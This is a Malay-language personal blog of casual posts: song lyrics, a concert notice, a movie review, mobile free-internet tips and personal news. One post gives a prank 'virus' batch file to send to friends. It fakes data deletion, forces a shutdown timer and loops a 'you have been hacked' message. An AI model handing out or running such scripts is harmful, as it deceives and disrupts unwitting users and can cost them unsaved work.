TOLONG SAYA!!!!!

kepada blogger sume....

sy nk tau cara delete recent post di bhagian gadget sy....

recent post tersebut xleh delete...sy xtau nk wat cane...

macam di locked...

anda bleh lhat bhgian tersebut di kanan bawah blog sye....buruk benorrr rupanya...huhu

kepada yang tahu cara edit bhagian tolong kongsi yerrr...

.....DELL....



inilah member ju yg gila-gila, kaki clubing n so much..
tp yg pelik, 2 anak sape...
anak dia ke...
OMG
xbgtau kt ktorng pon da ada anak...
nsib ada PAPARAZZI...
klu x ktorang xtau pon..
pape pon DELL ko ttap member aq la...hahaha
slamat yerrr dgan baby ko...hahaha
malu dengan anak???
...maaf la ek...klu slap...

MAS OR AIRASIA




SALAM...

MANE BEST EK...KE KUCHING

MAS OR AIRASIA

ni first time nk terbang...

pandangan anda macamana




tp MAS mahal dr AIRASIA!!!

lagu raya YUNA...kelakar doh...



Lirik Raya Oh Yeah – Yuna


Berlalu sudah bulan puasa
Masa untuk bersuka-ria
Oh yeah
Raikan hari raya


Kawan-kawan semuanya happy
Kekasih pulang dari oversea
Oh yeah
Samalah kita nanti


Mungkin dahulu terasa sepi
Hanya keluarga yang menemani
Tapi sekarang tidak lagi


Chorus
Raya kali ini mungkin berbeza
Kerna ku ada dia
Nyalakan pelita cinta di hari raya
Hati seperti bunga api bersama dia
Oh indahnya
Ku jatuh cinta di hari raya


Cinta di hari raya
Cinta di hari raya


Semangat kita nak bangun pagi
Pakai cantik-cantik hari ini
Oh yeah
Nak jumpa somebody
Rumahku dihiasi indah
Senyum sehingga hujung telinga
Oh yeah
Tunggu kekasih hati


Syawal kali ini ku tak sabar
Hati terasa berdebar-debar
Oh yeah
Diri sudah berpunya


Ulang Chorus


Cinta di hari raya
Cinta di hari raya
Cinta di hari raya

KONSERT PARAMORE LIVE IN MALAYSIA 19 OKTOBER 2010




Kumpulan muzik terkenal dari Amerika, kini telah mengesahkan kehadiran mereka dalam konsert julung kalinya di Malaysia pada 19 October 2010, Mereka mengesahkan kehadiran mereka di status fapage mereka di facebook.

Konsert akan berlangsung di Bukit Jalil, Kuala Lumpur. Harga tiket Paramore Live in Kuala Lumpur 2010 ialah RM358 untuk Rock Zone free standing category dan RM268, RM168 & RM98 bagi free seating, diskaun diberi bagi pasangan awal yang mendapatkan tiket.

Untuk maklumat lanjut boleh dapatkan di www.airasiaredtix.com dan www.ticketpro.com.my juga di Rock Corner dan TicketPro Outlets. Untuk lebih info bagi kumpulan ini, boleh ke website mereka www.paramore.net

membuat VIRUS yang tidak berbahaya dengan notepad



Siapa yang tidak tahu notepad? Kalau dah tau, Ini adalah tampilan yang dibuat seperti virus tidak berbahaya. jadi kalu mahu takutkan kawan, hantar program ini ke kawan anda..

ok, kita mula saja. taip tulisan di bawah ini ke notepad kosong/baru:

@echo off
C:
cls
Echo Do you want to kill all program’s? (Y/N)
pause >nul
cls
Echo Are you sure want to delete all data? (Y/N)
pause >nul
cls
Echo Deleting All Data
ping localhost -n 2 >nul
cls
Echo Deleting All Data.
ping localhost -n 2 >nul
cls
Echo Deleting All Data..
ping localhost -n 2 >nul
cls
Echo Deleting All Data…
cls
Echo Deleting All Data
ping localhost -n 2 >nul
cls
Echo Deleting All Data.
ping localhost -n 2 >nul
cls
Echo Deleting All Data..
ping localhost -n 2 >nul
cls
Echo Deleting All Data…
ping localhost -n 2 >nul
cls
dir /s
shutdown -s -t 900 -c “you have been
:hack
echo You have just been hacked
goto hack

setelah itu, save as notepad tersebut dengan [nama].bat (bukan [nama].Txt). then program tersebut siap untuk dihantar ke komputer kawan2...hehe

...Selamat Mencuba...

klu x menjadi..jgn salahkan aq...salahkan diri sendiri..

-RADJA-



JOM TONTON NEW SONG DR RADJA...

RADJA: SEBELUM TERLAMBAT



RADJA: TERUS TERANG

....RAYE TIME WIF FRENZ...







RESIDENT EVIL AFTERLIFE



NI CERITA BRU KT WAYANG...SO MMG BEST AR SAPE X TENGOK RUGI...BEBB

kisah pasal alice la kan.
dia nih manusia yg terkena virus.
segala term biologi disebut di dalam muvie ini.
sel T, virus dan macam2 lagi.
nasib baek paham. ><



alice nih manusia yg kena jangkitan virus yg mahu membalas dendam kepada umbrella corp.
then, after dia berjaya dgn plan membunuh dan memusnahkan pangkalan umbrella, org jahat itu mahu bunuh dia dgn self destruct d building.
dipendekkan cerita, orang jahat berjaya memerangkap alice dan rakan2 nya.

chris n claire redfield membantu alice.
tidak sangka luther west pon berjaya selamatkan diri.
orang jahat akhirnya mati kerana gagal dalam proses pelarian diri.

cerita ini mungkin ada sambungan kerana pada endingnya, pesawat umbrella mahu menyerang acardia.
acardia adalah tempat berlindung utk alice dan rakan2 nya.

so korang g la tgk kt wayang tok ketahui lebih lanjut.....
ni trailer citer nie
hope u all enjoy..

this blog under renovation



.........harap maaf diatas sebarang kesulitan.....
LAYAN NIEE DULU



video

BOLT VS OPERA MINI






korang nk tau selain OPERA MINI korang juga boleh gunakan software BOLT tok berinternet free dr maxis...caranya cam post aq sebelum ini...

yg bestnya BOLT nie paparan skrin dia cam kt dekstop dan bkanya mobile...so beat ar but loading dia slow n steady...haha..

download free BOLT: HERE

OMG SARAWAK-TIDAKKKKK



hari ini aq nampak abg posmen pusing2 hantar surat..
hati ku berdebar2 dan merasa hendak pecah...cehwahhh
aq da tahu hari ini aq akan dapat surat posting
dan aq dengar ramai kawan2ku dapat kt oversea
u know oversea...UK...no.no.no
SABAH N SARAWAK...

ternyata aq pon kena kat SARAWAK...ohhh no...
i hate that...mne xnya aq nie kra tkut naik flight..
lg2 skang ni kt berita asyik flight terhempas jerrr...huhu
mak tolonggggggg...xnak kt sarawak....

kepada kengkawan yg dpt kt 'OVERSEA' banyak2 bersabar...haha

INTERNET MOBILE PERCUMA DENGAN MAXIS DAN OPERA MINI



k nie la benda yg GEMPAK aq nk share ngan korang...2 pon klu korang nie guna MAXIS..klu x lupakan sajaaaa...



benda yang plg penting ko download dulu software OPER MINI then install but jgn start dulu..ikut arahan dibawah then baru start connect internet...

download OPERA MINI: CLICK HERE

klu xleh: CLICK HERE

i.) Tekan *100#
ii.) Pilih pada 7 untuk internet dan tetapan
iii.) Tekan 3 untuk Prepaid Broadband
iv.) Pilih 4 pula untuk Service Switching
v.) Pilih 2 untuk Switch to Prepaid Broadband
vi.) Akhir sekali tekan 1 untuk Proceed


Mesej diterima yang mengatakan "SIM anda telah ditukar kepada profil Broadband. APN anda = bbnet" Masalahnya tak blh terima Mesej Bergambar pada ketika ini..

klu korang nk hntar mms korang kena tukar dari prepaid broadband kepada prepaid hotlink

-SELAMAT MENCUBA-

GEMPAK!!! akan datang

sesuatu yg GEMPAK akan datang di theevilviryusz.blogspot untuk anda..


Nantikan kemunculannya xlama lg..

Khas tok anda....

SELAMAT HARI RAYA



theevilviryusz mengucapkan selamat hari raya kepada semua pengunjung blog ini n semua yg mengenali diri ini..harap sempena menyambut lebaran ini kita sama-sama bermaaf-maafan dan bg ynag ingin pul;ang ke kampong diharapkan pandu dengan cermat dan ingatlah orang yang tersayang

ikhlas dari:theevilviryusz

KONTROVERSI IKLAN TV3 SINARI LEBARAN 2010 TERPESONG DARI ISLAM??






hri nie aq opn fb...then aq tgk bnyk org komen2 mengnai iklan TV3 SINARI LEBARAN 2010yg dikatakan terpesong dan memesongkan orang islam dengan menyeletkan unsur agama lain dalam perayaan UMAT ISLAM..PIHAK TV3 telah tutup sume laman komen di semua web berkaitan TV3 termasuk FB=TV3MALAYSIA..ramai rakyat malaysia tidak berpuas hati dan ingin pihak TV3 memohon maaf diatas iklan yang x bertanggungjawab tersebut...



terdapat beberapa perkara dan elemen yang jelas songsang :

1. Ada macam Santa Clause ( atok yang bawa beca tu ) macam krismas.
2. ( beca terbang ) kendaraan Santa Clause elemen dari agama kristian.
3. Ada bunga lotus / teratai elemen dari agama Buddha
4. Pelita di atas bunga elemen dari Hindu perayaan Deepavali.

Enter your email address:

Delivered by FeedBurner

Related Posts Plugin for WordPress, Blogger...